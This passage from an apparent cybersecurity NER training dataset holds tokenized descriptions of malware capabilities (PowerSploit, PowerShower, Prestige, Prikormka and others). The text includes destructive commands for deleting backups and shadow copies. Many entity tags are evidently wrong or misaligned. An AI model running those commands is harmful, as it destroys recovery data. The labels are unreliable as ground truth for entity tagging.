"B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "achieves", - "persistence", - "by", - "using", - "various", - "Registry", - "Run", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "PowerDuke", - "uses", - "rundll32.exe", - "to", - "load." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "uses", - "steganography", - "to", - "hide", - "backdoors", - "in", - "PNG", - "files,", - "which", - "are", - "also", - "encrypted", - "using", - "the", - "Tiny", - "Encryption", - "Algorithm", - "(TEA)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "commands", - "to", - "get", - "information", - "about", - "the", - "victim's", - "name,", - "build,", - "version,", - "serial", - "number,", - "and", - "memory", - "usage." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "a", - "command", - "to", - "get", - "the", - "victim's", - "domain", - "and", - "NetBIOS", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "commands", - "to", - "get", - "the", - "current", - "user's", - "name", - "and", - "SID." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "has", - "commands", - "to", - "get", - "the", - "time", - "the", - "machine", - "was", - "built,", - "the", - "time,", - "and", - "the", - "time", - "zone." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerDuke", - "runs", - "<code>cmd.exe", - "/c</code>", - "and", - "sends", - "the", - "output", - "to", - "its", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "can", - "encrypt", - "browser", - "database", - "files", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "has", - "a", - "browser", - "info", - "stealer", - "module", - "that", - "can", - "read", - "Chrome", - "and", - "Edge", - "browser", - "database", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "has", - "the", - "ability", - "to", - "exfiltrate", - "data,", - "including", - "Chrome", - "and", - "Edge", - "browser", - "database", - "files,", - "from", - "compromised", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "can", - "use", - "base64", - "and", - "AES", - "ECB", - "decryption", - "prior", - "to", - "execution", - "of", - "downloaded", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "can", - "use", - "an", - "encrypted", - "channel", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "can", - "download", - "additional", - "payloads", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "can", - "use", - "a", - "module", - "to", - "log", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "PowerLess", - "can", - "stage", - "stolen", - "browser", - "data", - "in", - "`C:\\\\Windows\\\\Temp\\\\cup.tmp`", - "and", - "keylogger", - "data", - "in", - "`C:\\\\Windows\\\\Temp\\\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerLess", - "is", - "written", - "in", - "and", - "executed", - "via", - "PowerShell", - "without", - "using", - "powershell.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "PowerPunch", - "can", - "use", - "Base64-encoded", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "PowerPunch", - "can", - "use", - "the", - "volume", - "serial", - "number", - "from", - "a", - "target", - "host", - "to", - "generate", - "a", - "unique", - "XOR", - "key", - "for", - "the", - "next", - "stage", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerPunch", - "can", - "download", - "payloads", - "from", - "adversary", - "infrastructure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerPunch", - "has", - "the", - "ability", - "to", - "execute", - "through", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "used", - "7Zip", - "to", - "compress", - ".txt,", - ".pdf,", - ".xls", - "or", - ".doc", - "files", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "used", - "a", - "PowerShell", - "document", - "stealer", - "module", - "to", - "pack", - "and", - "exfiltrate", - ".txt,", - ".pdf,", - ".xls", - "or", - ".doc", - "files", - "smaller", - "than", - "5MB", - "that", - "were", - "modified", - "during", - "the", - "past", - "two", - "days." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "the", - "ability", - "to", - "remove", - "all", - "files", - "created", - "during", - "the", - "dropper", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "added", - "a", - "registry", - "key", - "so", - "future", - "powershell.exe", - "instances", - "are", - "spawned", - "with", - "coordinates", - "for", - "a", - "window", - "position", - "off-screen", - "by", - "default." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "added", - "a", - "registry", - "key", - "so", - "future", - "powershell.exe", - "instances", - "are", - "spawned", - "off-screen", - "by", - "default,", - "and", - "has", - "removed", - "all", - "registry", - "entries", - "that", - "are", - "left", - "behind", - "during", - "the", - "dropper", - "process." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "is", - "a", - "backdoor", - "written", - "in", - "PowerShell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "the", - "ability", - "to", - "deploy", - "a", - "reconnaissance", - "module", - "to", - "retrieve", - "a", - "list", - "of", - "the", - "active", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "sets", - "up", - "persistence", - "with", - "a", - "Registry", - "run", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "the", - "ability", - "to", - "encode", - "C2", - "communications", - "with", - "base64", - "encoding." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "collected", - "system", - "information", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "the", - "ability", - "to", - "identify", - "the", - "current", - "Windows", - "domain", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "the", - "ability", - "to", - "identify", - "the", - "current", - "user", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "the", - "ability", - "to", - "save", - "and", - "execute", - "VBScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "PowerShower", - "has", - "sent", - "HTTP", - "GET", - "and", - "POST", - "requests", - "to", - "C2", - "servers", - "to", - "send", - "information", - "and", - "receive", - "instructions." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Invoke-TokenManipulation</code>", - "Exfiltration", - "module", - "can", - "be", - "used", - "to", - "manipulate", - "tokens." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Get-MicrophoneAudio</code>", - "Exfiltration", - "module", - "can", - "record", - "system", - "microphone", - "audio." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "ScriptModification", - "modules", - "that", - "compress", - "and", - "encode", - "scripts", - "and", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "has", - "several", - "modules", - "that", - "search", - "the", - "Windows", - "Registry", - "for", - "stored", - "credentials:", - "<code>Get-UnattendedInstallFile</code>,", - "<code>Get-Webconfig</code>,", - "<code>Get-ApplicationHost</code>,", - "<code>Get-SiteListPassword</code>,", - "<code>Get-CachedGPPPassword</code>,", - "and", - "<code>Get-RegistryAutoLogon</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Privesc-PowerUp", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "DLL", - "hijacking", - "opportunities", - "in", - "services", - "and", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Exfiltration", - "modules", - "that", - "can", - "access", - "data", - "from", - "local", - "files,", - "volumes,", - "and", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "has", - "modules", - "such", - "as", - "<code>Get-NetDomainTrust</code>", - "and", - "<code>Get-NetForestTrust</code>", - "to", - "enumerate", - "domain", - "and", - "forest", - "trusts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Idus", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "CodeExecution", - "modules", - "that", - "inject", - "code", - "(DLL,", - "shellcode)", - "into", - "a", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Exfiltration", - "modules", - "that", - "can", - "harvest", - "credentials", - "from", - "Group", - "Policy", - "Preferences." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Find-AVSignature</code>", - "AntivirusBypass", - "module", - "can", - "be", - "used", - "to", - "locate", - "single", - "byte", - "anti-virus", - "signatures." - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Invoke-Kerberoast</code>", - "module", - "can", - "request", - "service", - "tickets", - "and", - "return", - "crackable", - "ticket", - "hashes." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Get-Keystrokes</code>", - "Exfiltration", - "module", - "can", - "log", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Exfiltration", - "modules", - "that", - "can", - "harvest", - "credentials", - "using", - "Mimikatz." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Get-ProcessTokenGroup</code>", - "Privesc-PowerUp", - "module", - "can", - "enumerate", - "all", - "SIDs", - "associated", - "with", - "its", - "current", - "token." - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Privesc-PowerUp", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "path", - "interception", - "opportunities", - "in", - "the", - "PATH", - "environment", - "variable." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Privesc-PowerUp", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "search", - "order", - "hijacking", - "vulnerabilities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Privesc-PowerUp", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "unquoted", - "path", - "vulnerabilities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "modules", - "are", - "written", - "in", - "and", - "executed", - "via", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Get-ProcessTokenPrivilege</code>", - "Privesc-PowerUp", - "module", - "can", - "enumerate", - "privileges", - "for", - "a", - "given", - "process." - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Privesc-PowerUp", - "modules", - "that", - "can", - "query", - "Registry", - "keys", - "for", - "potential", - "opportunities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "reflectively", - "loads", - "a", - "Windows", - "PE", - "file", - "into", - "a", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>New-UserPersistenceOption</code>", - "Persistence", - "argument", - "can", - "be", - "used", - "to", - "establish", - "via", - "the", - "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "Registry", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>New-UserPersistenceOption</code>", - "Persistence", - "argument", - "can", - "be", - "used", - "to", - "establish", - "via", - "a", - "Scheduled", - "Task/Job." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Get-TimedScreenshot</code>", - "Exfiltration", - "module", - "can", - "take", - "screenshots", - "at", - "regular", - "intervals." - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "B-SamFile", - "I-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Install-SSP</code>", - "Persistence", - "module", - "can", - "be", - "used", - "to", - "establish", - "by", - "installing", - "a", - "SSP", - "DLL." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Exfiltration", - "modules", - "that", - "can", - "harvest", - "credentials", - "from", - "Windows", - "vault", - "credential", - "objects." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit's", - "<code>Invoke-WmiCommand</code>", - "CodeExecution", - "module", - "uses", - "WMI", - "to", - "execute", - "and", - "retrieve", - "the", - "output", - "from", - "a", - "PowerShell", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerSploit", - "contains", - "a", - "collection", - "of", - "Privesc-PowerUp", - "modules", - "that", - "can", - "discover", - "and", - "replace/modify", - "service", - "binaries,", - "paths,", - "and", - "configs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerStallion", - "uses", - "Microsoft", - "OneDrive", - "as", - "a", - "C2", - "server", - "via", - "a", - "network", - "drive", - "mapped", - "with", - "<code>net", - "use</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerStallion", - "uses", - "a", - "XOR", - "cipher", - "to", - "encrypt", - "command", - "output", - "written", - "to", - "its", - "OneDrive", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "PowerStallion", - "uses", - "PowerShell", - "loops", - "to", - "iteratively", - "check", - "for", - "available", - "commands", - "in", - "its", - "OneDrive", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerStallion", - "has", - "been", - "used", - "to", - "monitor", - "process", - "lists." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PowerStallion", - "modifies", - "the", - "MAC", - "times", - "of", - "its", - "local", - "log", - "files", - "to", - "match", - "that", - "of", - "the", - "victim's", - "desktop.ini", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "has", - "leveraged", - "the", - "CryptoPP", - "C++", - "library", - "to", - "encrypt", - "files", - "on", - "target", - "systems", - "using", - "AES", - "and", - "appended", - "filenames", - "with", - "`.enc`." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Prestige", - "can", - "traverse", - "the", - "file", - "system", - "to", - "discover", - "files", - "to", - "encrypt", - "by", - "identifying", - "specific", - "extensions", - "defined", - "in", - "a", - "hardcoded", - "list." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "has", - "been", - "deployed", - "using", - "the", - "Default", - "Domain", - "Group", - "Policy", - "Object", - "from", - "an", - "Active", - "Directory", - "Domain", - "Controller." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "can", - "delete", - "the", - "backup", - "catalog", - "from", - "the", - "target", - "system", - "using:", - "`c:\\Windows\\System32\\wbadmin.exe", - "delete", - "catalog", - "-quiet`", - "and", - "can", - "also", - "delete", - "volume", - "shadow", - "copies", - "using:", - "`\\Windows\\System32\\vssadmin.exe", - "delete", - "shadows", - "/all", - "/quiet`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "has", - "the", - "ability", - "to", - "register", - "new", - "registry", - "keys", - "for", - "a", - "new", - "extension", - "handler", - "via", - "`HKCR\\.enc`", - "and", - "`HKCR\\enc\\shell\\open\\command`." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "has", - "used", - "the", - "`Wow64DisableWow64FsRedirection()`", - "and", - "`Wow64RevertWow64FsRedirection()`", - "functions", - "to", - "disable", - "and", - "restore", - "file", - "system", - "redirection." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "can", - "use", - "PowerShell", - "for", - "payload", - "execution", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "has", - "been", - "executed", - "on", - "a", - "target", - "system", - "through", - "a", - "scheduled", - "task", - "created", - "by", - "Sandworm", - "Team", - "using", - "Impacket." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Prestige", - "has", - "attempted", - "to", - "stop", - "the", - "MSSQL", - "Windows", - "service", - "to", - "ensure", - "successful", - "encryption", - "using", - "`C:\\Windows\\System32\\net.exe", - "stop", - "MSSQLSERVER`." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "collecting", - "documents", - "from", - "removable", - "media,", - "Prikormka", - "compresses", - "the", - "collected", - "files,", - "and", - "encrypts", - "it", - "with", - "Blowfish." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "collects", - "passwords", - "stored", - "in", - "applications", - "installed", - "on", - "the", - "victim." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "gathers", - "logins", - "and", - "passwords", - "stored", - "in", - "applications", - "on", - "the", - "victims,", - "including", - "Google", - "Chrome,", - "Mozilla", - "Firefox,", - "and", - "several", - "other", - "browsers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "uses", - "DLL", - "search", - "order", - "hijacking", - "for", - "persistence", - "by", - "saving", - "itself", - "as", - "ntshrui.dll", - "to", - "the", - "Windows", - "directory", - "so", - "it", - "will", - "load", - "before", - "the", - "legitimate", - "ntshrui.dll", - "saved", - "in", - "the", - "System32", - "subdirectory." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "contains", - "a", - "module", - "that", - "collects", - "documents", - "with", - "certain", - "extensions", - "from", - "removable", - "media", - "or", - "fixed", - "drives", - "connected", - "via", - "USB." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "resources", - "in", - "Prikormka", - "are", - "encrypted", - "with", - "a", - "simple", - "XOR", - "operation", - "or", - "encoded", - "with", - 